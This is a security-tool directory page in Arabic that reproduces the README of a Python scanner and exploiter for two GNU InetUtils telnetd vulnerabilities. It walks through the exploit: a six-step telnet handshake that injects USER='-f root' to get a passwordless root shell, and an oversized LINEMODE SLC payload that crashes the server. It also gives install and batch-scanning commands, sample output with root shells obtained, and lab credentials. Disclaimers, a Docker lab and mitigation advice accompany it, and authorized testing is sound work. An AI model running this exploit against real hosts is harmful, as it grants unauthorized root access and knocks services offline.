Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
telnet_scan — ماسح/مستغل CVE-2026-24061 & CVE-2026-32746 | Kitploit
أدوات/GitHubGitHub/ekomssavior/telnet_scan
ماسحات الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالمصادقةالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubekomssavior/telnet_scan

telnet_scan

ماسح/مستغل CVE-2026-24061 & CVE-2026-32746

عرض المستودع
1161منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح ثغرات Telnet (CVE-2026-24061 و CVE-2026-32746)

License:ek0ms

أداة تقييم أمنية مبنية بلغة Python تكتشف (وعند الإمكان تستغل) ثغريتين خطيرتين في GNU InetUtils telnetd:

  • CVE-2026-24061 – تجاوز المصادقة عبر حقن متغير البيئة USER (CVSS 9.8)
  • CVE-2026-32746 – تجاوز سعة المخزن المؤقت قبل المصادقة في معالج LINEMODE SLC (CVSS 9.8)

إخلاء مسؤولية مهم

هذه الأداة لأغراض الاختبار الأمني المصرح به والتعليم فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني. يخلي المؤلفون مسؤوليتهم عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة. استخدمها على مسؤوليتك الخاصة.

image1(1)

الميزات

  • مسح هدف واحد – أدخل عناوين IP أو أسماء نطاقات أثناء التشغيل
  • المسح الدفعي – رفع ملف يحتوي على عدة أهداف (هدف واحد في كل سطر)
  • الاختبار الانتقائي – اختبار أي من الثغرتين بشكل فردي أو كلتيهما
  • استغلال CVE-2026-24061 – إذا كانت الثغرة موجودة، تقوم الأداة بإسقاطك في شل جذر تفاعلي مباشرة في نفس الطرفية
  • كشف CVE-2026-32746 – يحدد الأنظمة الضعيفة عبر كشف الانهيار المتحكم به
  • معالجة طرفية نظيفة – شل وضع خام مع استعادة صحيحة عند الخروج
  • التحقق من الاتصال – يميز بين المنافذ المفلترة والخدمات غير المتصلة والثغرات الفعلية
  • تصحيح الأخطاء المفصل – اضبط TELNET_SCAN_VERBOSE=1 لرؤية كل حزمة IAC وسرد خطوات الاستغلال خطوة بخطوة
  • بيئة مختبر Docker – هدف ضعيف مكتفي بذاته للاختبار الآمن
  • التثبيت

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    الاستخدام

    التنفيذ الأساسي

    root@kitploit:~
    python3 telnet_scanner.py
    

    مختبر Docker (اختبار آمن)

    اختبر الاستغلال ضد هدف ضعيف معروف دون المخاطرة بأنظمة حقيقية:

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # Target: 127.0.0.1, Port: 2323
    

    يدير المختبر إصدارًا ضعيفًا من GNU InetUtils 2.5 telnetd في حاوية معزولة، مرتبطة فقط بـ localhost. لا تعرض للشبكة.

    الوضع المفصل

    صَحِّح مصافحة telnet وشاهد بالضبط ما يحدث على الشبكة:

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    يظهر الإخراج المفصل:

    • كل أمر IAC (DO/WILL/SB) يُرسل ويُستقبل
    • أسماء خيارات telnet المفكوكة
    • تفريغ سداسي عشري للحمولة لمفاوضات فرعية
    • تدفق الاستغلال خطوة بخطوة (مصافحة من 6 خطوات)

    IMG_2498

    سير عمل الهدف الفردي

    1. اختر الخيار 1
    2. أدخل الهدف (IP أو نطاق، مثل 192.168.1.100 أو example.com)
    3. حدد المنفذ (الافتراضي 23 إذا تُرك فارغًا)
    4. حدد نوع الاختبار:
      • 1 – كلتا الثغرتين
      • 2 – فقط CVE-2026-24061 (تجاوز المصادقة)
      • 3 – فقط CVE-2026-32746 (تجاوز سعة المخزن المؤقت)

    سير عمل المسح الدفعي

    1. أنشئ ملفًا بالأهداف (هدف واحد في كل سطر) مثال targets.txt:
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # This is a comment line - ignored
      
    2. اختر الخيار 2
    3. أدخل اسم الملف
    4. حدد المنفذ (الافتراضي 23)
    5. حدد نوع الاختبار (1 أو 2 أو 3)
    6. سيقوم الماسح بـ:
      • يعرض التقدم لكل هدف
      • يعرض النتائج عند اكتمالها
      • يقدم جدول ملخص في النهاية

    عند الحصول على شل

    إذا نجح CVE-2026-24061:

    1. يتم اكتشاف الثغرة
    2. تظهر شل جذر تفاعلية مباشرة في نفس نافذة الطرفية
    3. اكتب الأوامر وشاهد المخرجات فورًا (مثل id وwhoami وls)
    4. اضغط Ctrl+C للخروج من الشل والعودة إلى قائمة الماسح
    5. بالنسبة للمسح الدفعي، سيُطلب منك ما إذا كنت تريد التفاعل مع الشل أم مواصلة المسح

    لا حاجة لطرفية منفصلة أو خطوات إضافية.

    كيف يعمل

    CVE-2026-24061 – تجاوز المصادقة

    يتبع الاستغلال مصافحة telnet دقيقة من 6 خطوات لضمان التوافق مع GNU InetUtils telnetd الحقيقي:

    1. انتظر مفاوضات الخادم – حتى 15 ثانية لـ DNS العكسي وخيارات DO الأولية
    2. الرد بـ WILL – تأكيد TTYPE وTSPEED وXDISPLOC وNEW_ENVIRON
    3. انتظر SB SEND – طلبات التفاوض الفرعي من الخادم
    4. أرسل حمولة الاستغلال – تعيين USER="-f root" عبر التفاوض الفرعي NEW_ENVIRON
    5. تعامل مع التبادلات المتبقية – الرد على DO/WILL لـ SGA وECHO وLINEMODE وNAWS
    6. اكتشاف الشل – ابحث عن المطالبة # أو root@ أو $

    يرسل خيط البقاء على قيد الحياة IAC NOP كل ثانيتين لمنع ttloop() الخاص بـ telnetd من اكتشاف EOF واستدعاء exit(1) قبل معالجة الحمولة.

    يقوم telnetd الضعيف بتمرير -f root إلى /usr/bin/login، متجاوزًا المصادقة ومانحًا وصولًا فوريًا لشل الجذر.

    CVE-2026-32746 – كشف تجاوز سعة المخزن المؤقت

    • يتفاوض على خيار LINEMODE (RFC 1184)
    • يرسل أكثر من 500 توائم SLC (أكثر من 1500 بايت) لتجاوز سعة المخزن المؤقت ذي الحجم الثابت
    • يراقب إعادة تعيين/انهيار الاتصال لتأكيد الثغرة

    التحقق من الاتصال

    • يقوم بالمسح المسبق للتحقق من توفر الخدمة قبل محاولة الاستغلال
    • يميز بين:
      • المنافذ المفلترة (حظر جدار الحماية)
      • الخدمات غير المتصلة (لا توجد خدمة قيد التشغيل)
      • الخدمات الضعيفة (استغلال ناجح)

    نموذج الإخراج

    هدف فردي

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. Scan a single target
    2. Scan targets from file (one IP/hostname per line)
    3. Exit
    
    Choose option: 1
    Port (default 23): 
    
    Which tests to run?
    1. Both
    2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
    3. Only CVE-2026-32746 (buffer overflow detection)
    Choice [1-3]: 1
    Target (IP or domain): 192.168.1.100
    
    [*] Resolved 192.168.1.100 -> 192.168.1.100
    [*] Scanning 192.168.1.100:23...
    
    [*] Checking if service is reachable...
    [+] Service reachable
    
    [*] Testing CVE-2026-24061 (authentication bypass)...
    [!] CVE-2026-24061: VULNERABLE – shell obtained!
    
    ============================================================
    [+] ROOT SHELL OBTAINED! You are now in an interactive root shell.
    [+] Type commands directly here. Press Ctrl+C to exit shell.
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    إخراج الوضع المفصل (جزئي)

    root@kitploit:~
        [STEP 1/6] Waiting for server negotiation (may take up to 15s)...
        [STEP 1/6] Got 48 bytes: fffb18fffb20fffb23fffb27...
               decoded: IAC DO TERMINAL-TYPE
               decoded: IAC DO TERMINAL-SPEED  
               decoded: IAC DO X-DISPLAY-LOCATION
               decoded: IAC DO NEW-ENVIRON
        [STEP 2/6] Responding WILL to all DO options
        [STEP 3/6] Waiting for SB SEND subnegotiation requests...
        [STEP 4/6] Sending subnegotiation responses...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
        [STEP 5/6] Handling remaining option negotiations...
        [STEP 5/6] Text received: 'root@vuln-lab:~# '
        [RESULT] SUCCESS: Passwordless root login via USER="-f root" injection
    

    المسح الدفعي

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. Scan a single target
    2. Scan targets from file (one IP/hostname per line)
    3. Exit
    
    Choose option: 2
    Port (default 23): 
    Enter filename with targets (one per line): targets.txt
    
    Which tests to run?
    1. Both
    2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
    3. Only CVE-2026-32746 (buffer overflow detection)
    Choice [1-3]: 1
    
    [*] Loaded 3 targets from targets.txt
    
    ==================================================
    [1/3] Scanning 192.168.1.100:23
    ==================================================
    [*] Resolved 192.168.1.100 -> 192.168.1.100
    [+] Service reachable
    
    [*] Testing CVE-2026-24061...
    [!] CVE-2026-24061: VULNERABLE – shell obtained!
    
    [?] Shell obtained! Interact now? (y/N): n
    
    [*] Testing CVE-2026-32746...
    [+] Server did not crash; likely not vulnerable
    
    ==================================================
    [2/3] Scanning 192.168.1.101:23
    ==================================================
    [-] Service not reachable on 192.168.1.101:23
    
    ==================================================
    [3/3] Scanning example.com:23
    ==================================================
    [*] Resolved example.com -> 93.184.216.34
    [+] Service reachable
    
    [*] Testing CVE-2026-24061...
    [+] No response received; may still be vulnerable
    
    [*] Testing CVE-2026-32746...
    [!] CVE-2026-32746: VULNERABLE (server crashed)
    
    ============================================================
    SCAN SUMMARY
    ============================================================
    192.168.1.100: VULNERABLE to CVE-2026-24061
    192.168.1.101: Service unreachable
    example.com: VULNERABLE to CVE-2026-32746
    ============================================================
    

    التخفيف

    إذا اكتشفت أنظمة ضعيفة، قم بتطبيق هذه الإصلاحات:

    1. ترقية GNU InetUtils إلى الإصدار 2.8 أو أحدث
    2. تعطيل telnetd وحظر TCP/23 عند حدود الشبكة
    3. تقييد الوصول إلى الشبكات الموثوقة فقط
    4. مراقبة السجلات للاتصالات بقيم NEW_ENVIRON USER التي تبدأ بـ -f

    التطوير والاختبار

    مختبر Docker

    يوفر الدليل lab/ المضمن بيئة اختبار آمنة وقابلة للتكرار:

    root@kitploit:~
    cd lab
    docker compose up -d
    # Wait ~10 seconds for telnetd to initialize
    python3 ../telnet_scanner.py
    # Target: 127.0.0.1, Port: 2323
    

    ميزات المختبر:

    • GNU InetUtils 2.5 مترجم من المصدر (إصدارات ضعيفة)
    • تشغيل telnetd داخل حاوية معزولة
    • مرتبطة فقط بـ localhost:2323 – آمنة للتطوير
    • تتضمن مستخدم اختبار (labuser:labpass123) لتصحيح الأخطاء

    أوقف المختبر عند الانتهاء:

    root@kitploit:~
    cd lab && docker compose down
    

    القيود المعروفة

    • قد يتسبب اختبار التجاوز (CVE-2026-32746) في انهيار خدمة telnetd المستهدفة
    • لا يتم دعم مفاتيح الأسهم وتغيير حجم الطرفية بشكل كامل في الشل التفاعلي
    • قد تتداخل بعض جدران الحماية أو تكوينات الشبكة مع مفاوضات خيارات Telnet
    • مستخدمو Windows: تتطلب الشل التفاعلية طرفية شبيهة بـ Unix (WSL أو Cygwin أو Linux/macOS)

    image0(2)

    شكر وتقدير

    شكر خاص لـ @leetcrypt – المصافحة الصحيحة المكونة من 6 خطوات، خيط البقاء على قيد الحياة، الوضع المفصل، ومختبر Docker ممتاز!


    إخلاء المسؤولية: لأغراض الاختبار الأمني المصرح به والتعليم فقط.

    تنزيل الأداة